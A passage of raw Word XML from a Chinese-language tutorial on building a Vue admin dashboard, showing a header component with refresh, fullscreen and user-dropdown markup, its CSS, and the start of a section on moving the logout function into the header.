      </w:r>
    </w:p>
    <w:p w14:paraId="44437A67" w14:textId="77777777" w:rsidR="005B1F9E" w:rsidRDefault="005B1F9E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        &lt;el-icon class="icon-btn"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BBBA200" w14:textId="77777777" w:rsidR="005B1F9E" w:rsidRDefault="005B1F9E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">            &lt;Refresh /&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1842B903" w14:textId="77777777" w:rsidR="005B1F9E" w:rsidRDefault="005B1F9E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        &lt;/el-icon&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52C067DA" w14:textId="77777777" w:rsidR="005B1F9E" w:rsidRDefault="005B1F9E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        &lt;div class="ml-auto flex items-center " style="margin-left: auto;"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A5D0624" w14:textId="77777777" w:rsidR="005B1F9E" w:rsidRDefault="005B1F9E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">            &lt;el-icon class="icon-btn"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DC154CB" w14:textId="77777777" w:rsidR="005B1F9E" w:rsidRDefault="005B1F9E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                &lt;FullScreen /&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CDEAEB0" w14:textId="77777777" w:rsidR="005B1F9E" w:rsidRDefault="005B1F9E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">            &lt;/el-icon&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25E05F98" w14:textId="77777777" w:rsidR="005B1F9E" w:rsidRDefault="005B1F9E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">            &lt;el-dropdown class="dropdown"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BC012E7" w14:textId="77777777" w:rsidR="005B1F9E" w:rsidRDefault="005B1F9E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                &lt;span class="flex items-center text-light-50"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02A1E2BE" w14:textId="77777777" w:rsidR="005B1F9E" w:rsidRDefault="005B1F9E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                    &lt;el-button type="el-dropdown-link" class=" bg-transparent text-light-200"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="178436B1" w14:textId="77777777" w:rsidR="005B1F9E" w:rsidRDefault="005B1F9E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                        &lt;el-avatar class="mr-2" :size="25" :src="$store.state.user.avatar" /&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4632E976" w14:textId="77777777" w:rsidR="005B1F9E" w:rsidRDefault="005B1F9E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                        {{ $store.state.user.username }}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A333773" w14:textId="77777777" w:rsidR="005B1F9E" w:rsidRDefault="005B1F9E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                        &lt;el-icon class="el-icon--right"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09E2F99E" w14:textId="77777777" w:rsidR="005B1F9E" w:rsidRDefault="005B1F9E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                            &lt;arrow-down /&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="638ED6C5" w14:textId="77777777" w:rsidR="005B1F9E" w:rsidRDefault="005B1F9E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                        &lt;/el-icon&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79D2427E" w14:textId="77777777" w:rsidR="005B1F9E" w:rsidRDefault="005B1F9E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                    &lt;/el-button&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="124DD071" w14:textId="77777777" w:rsidR="005B1F9E" w:rsidRDefault="005B1F9E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                &lt;/span&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E422B7C" w14:textId="77777777" w:rsidR="005B1F9E" w:rsidRDefault="005B1F9E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                &lt;template #dropdown&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B8B02DF" w14:textId="77777777" w:rsidR="005B1F9E" w:rsidRDefault="005B1F9E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                    &lt;el-dropdown-menu&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EFA0225" w14:textId="77777777" w:rsidR="005B1F9E" w:rsidRDefault="005B1F9E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">                        &lt;el-dropdown-item&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>修改密码</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>&lt;/el-dropdown-item&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58313D2D" w14:textId="77777777" w:rsidR="005B1F9E" w:rsidRDefault="005B1F9E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">                        &lt;el-dropdown-item&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>退出登录</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>&lt;/el-dropdown-item&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7404CB60" w14:textId="77777777" w:rsidR="005B1F9E" w:rsidRDefault="005B1F9E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                    &lt;/el-dropdown-menu&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76FB0E85" w14:textId="77777777" w:rsidR="005B1F9E" w:rsidRDefault="005B1F9E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                &lt;/template&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1868ECD8" w14:textId="77777777" w:rsidR="005B1F9E" w:rsidRDefault="005B1F9E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">            &lt;/el-dropdown&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C52DCEF" w14:textId="77777777" w:rsidR="005B1F9E" w:rsidRDefault="005B1F9E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        &lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61F274B8" w14:textId="77777777" w:rsidR="005B1F9E" w:rsidRDefault="005B1F9E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    &lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D74A404" w14:textId="77777777" w:rsidR="005B1F9E" w:rsidRDefault="005B1F9E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>&lt;/template&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EC4F9E1" w14:textId="77777777" w:rsidR="005B1F9E" w:rsidRDefault="005B1F9E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>&lt;script setup&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15B31112" w14:textId="77777777" w:rsidR="005B1F9E" w:rsidRDefault="005B1F9E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="11A29B69" w14:textId="77777777" w:rsidR="005B1F9E" w:rsidRDefault="005B1F9E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2630C3A4" w14:textId="77777777" w:rsidR="005B1F9E" w:rsidRDefault="005B1F9E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="37CE42C5" w14:textId="77777777" w:rsidR="005B1F9E" w:rsidRDefault="005B1F9E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>&lt;style&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EE45162" w14:textId="77777777" w:rsidR="005B1F9E" w:rsidRDefault="005B1F9E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>.f-header {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18132A4B" w14:textId="77777777" w:rsidR="005B1F9E" w:rsidRDefault="005B1F9E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    @apply flex items-center bg-indigo-700 text-light-200 fixed top-0 left-0 right-0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="324A454E" w14:textId="77777777" w:rsidR="005B1F9E" w:rsidRDefault="005B1F9E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    height: 64px;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="665194CE" w14:textId="77777777" w:rsidR="005B1F9E" w:rsidRDefault="005B1F9E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62C68A03" w14:textId="77777777" w:rsidR="005B1F9E" w:rsidRDefault="005B1F9E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="75A9737F" w14:textId="77777777" w:rsidR="005B1F9E" w:rsidRDefault="005B1F9E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>.logo {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00C0CA40" w14:textId="77777777" w:rsidR="005B1F9E" w:rsidRDefault="005B1F9E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    width: 250px;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F1B9725" w14:textId="77777777" w:rsidR="005B1F9E" w:rsidRDefault="005B1F9E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    @apply flex items-center justify-center text-xl font-thin;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6082527D" w14:textId="77777777" w:rsidR="005B1F9E" w:rsidRDefault="005B1F9E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02A367F2" w14:textId="77777777" w:rsidR="005B1F9E" w:rsidRDefault="005B1F9E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="51D75CEB" w14:textId="77777777" w:rsidR="005B1F9E" w:rsidRDefault="005B1F9E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>.icon-btn {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E149171" w14:textId="77777777" w:rsidR="005B1F9E" w:rsidRDefault="005B1F9E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    @apply flex items-center justify-center;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="061C8661" w14:textId="77777777" w:rsidR="005B1F9E" w:rsidRDefault="005B1F9E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    width: 42px;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F5BE10D" w14:textId="77777777" w:rsidR="005B1F9E" w:rsidRDefault="005B1F9E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    height: 64px;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52D570D6" w14:textId="77777777" w:rsidR="005B1F9E" w:rsidRDefault="005B1F9E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    cursor: pointer;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="615695A9" w14:textId="77777777" w:rsidR="005B1F9E" w:rsidRDefault="005B1F9E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51B85F04" w14:textId="77777777" w:rsidR="005B1F9E" w:rsidRDefault="005B1F9E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="29220880" w14:textId="77777777" w:rsidR="005B1F9E" w:rsidRDefault="005B1F9E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>.icon-btn:hover {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19ACED7F" w14:textId="77777777" w:rsidR="005B1F9E" w:rsidRDefault="005B1F9E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    @apply bg-indigo-200;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A1FD032" w14:textId="77777777" w:rsidR="005B1F9E" w:rsidRDefault="005B1F9E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5182C456" w14:textId="77777777" w:rsidR="005B1F9E" w:rsidRDefault="005B1F9E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="20B2FD99" w14:textId="77777777" w:rsidR="005B1F9E" w:rsidRDefault="005B1F9E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>.f-header .dropdown {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DB78EB5" w14:textId="77777777" w:rsidR="005B1F9E" w:rsidRDefault="005B1F9E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    @apply flex items-center justify-center mx-5;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55EA6B1A" w14:textId="77777777" w:rsidR="005B1F9E" w:rsidRDefault="005B1F9E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    width: 200px;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D1BAAE0" w14:textId="77777777" w:rsidR="005B1F9E" w:rsidRDefault="005B1F9E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    height: 64px;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49771277" w14:textId="77777777" w:rsidR="005B1F9E" w:rsidRDefault="005B1F9E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    cursor: pointer;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="780C36D2" w14:textId="77777777" w:rsidR="005B1F9E" w:rsidRDefault="005B1F9E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="587C9C45" w14:textId="079FFD18" w:rsidR="00A92AAA" w:rsidRDefault="005B1F9E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>&lt;/style&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F83DCAE" w14:textId="77777777" w:rsidR="00A92AAA" w:rsidRPr="00181907" w:rsidRDefault="00A92AAA" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="40B5E257" w14:textId="5C7E5B09" w:rsidR="00A92AAA" w:rsidRDefault="005B1F9E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7677416E" wp14:editId="35F3F296">
            <wp:extent cx="5274310" cy="1397000"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="145616375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63756" name="图片 1" descr="图形用户界面, 应用程序&#10;&#10;描述已自动生成"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId207"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5274310" cy="1397000"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CB9095C" w14:textId="77777777" w:rsidR="00A92AAA" w:rsidRPr="00181907" w:rsidRDefault="00A92AAA" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="01A8DB87" w14:textId="3A3A594F" w:rsidR="00A92AAA" w:rsidRDefault="005B16D0" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="705" w:name="_Toc159780135"/>
      <w:r w:rsidRPr="005B16D0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>公共头部开发</w:t>
      </w:r>
      <w:r w:rsidRPr="005B16D0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="005B16D0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>刷新和全屏</w:t>
      </w:r>
      <w:bookmarkEnd w:id="705"/>
    </w:p>
    <w:p w14:paraId="45FA79FF" w14:textId="1F8D24E0" w:rsidR="00A92AAA" w:rsidRDefault="00B92228" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>现在要点击此处头像，能够触发“改密”和“登出”的功能</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35270F12" w14:textId="608F2872" w:rsidR="00A92AAA" w:rsidRPr="005B16D0" w:rsidRDefault="00B92228" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6F0F9752" wp14:editId="1443ADE5">
            <wp:extent cx="5274310" cy="1659890"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="97621160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11609" name="图片 1" descr="图形用户界面, 文本, 应用程序&#10;&#10;描述已自动生成"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId208"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5274310" cy="1659890"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3679E5E7" w14:textId="77777777" w:rsidR="00A92AAA" w:rsidRDefault="00A92AAA" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7D75A9E1" w14:textId="17DEE068" w:rsidR="00A92AAA" w:rsidRDefault="004F1C6F" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>admin</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>”的登出功能，需要从</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">pages/index.vue </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中挪到</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>p</w:t>
      </w:r>
      <w:r>
        <w:t>ages/FHeader.vue</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26030A36" w14:textId="732580C4" w:rsidR="00A92AAA" w:rsidRPr="004F1C6F" w:rsidRDefault="004F1C6F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004F1C6F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>p</w:t>
      </w:r>
      <w:r w:rsidRPr="004F1C6F">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>ages/index.vue</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B9B7BE3" w14:textId="77777777" w:rsidR="004F1C6F" w:rsidRDefault="004F1C6F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>&lt;template&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16EC9D91" w14:textId="77777777" w:rsidR="004F1C6F" w:rsidRDefault="004F1C6F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    &lt;div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E657EF3" w14:textId="77777777" w:rsidR="004F1C6F" w:rsidRDefault="004F1C6F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>后台首页</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66C3D763" w14:textId="77777777" w:rsidR="004F1C6F" w:rsidRDefault="004F1C6F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="022AEA21" w14:textId="77777777" w:rsidR="004F1C6F" w:rsidRDefault="004F1C6F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        {{ $store.state.user.username }}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43649C73" w14:textId="77777777" w:rsidR="004F1C6F" w:rsidRDefault="004F1C6F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="05D2C4EB" w14:textId="77777777" w:rsidR="004F1C6F" w:rsidRDefault="004F1C6F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="01D92D63" w14:textId="77777777" w:rsidR="004F1C6F" w:rsidRDefault="004F1C6F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    &lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03AEE36B" w14:textId="77777777" w:rsidR="004F1C6F" w:rsidRDefault="004F1C6F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>&lt;/template&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6757390B" w14:textId="77777777" w:rsidR="004F1C6F" w:rsidRDefault="004F1C6F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="18343C2C" w14:textId="77777777" w:rsidR="004F1C6F" w:rsidRDefault="004F1C6F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>&lt;script setup&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DAB7BA1" w14:textId="26F51EBB" w:rsidR="00A92AAA" w:rsidRPr="00181907" w:rsidRDefault="004F1C6F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16B2AA4E" w14:textId="0588D8D3" w:rsidR="00A92AAA" w:rsidRDefault="004F1C6F" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>p</w:t>
      </w:r>
      <w:r>
        <w:t>ages/FHeader.vue</w:t>
      </w:r>
    </w:p>
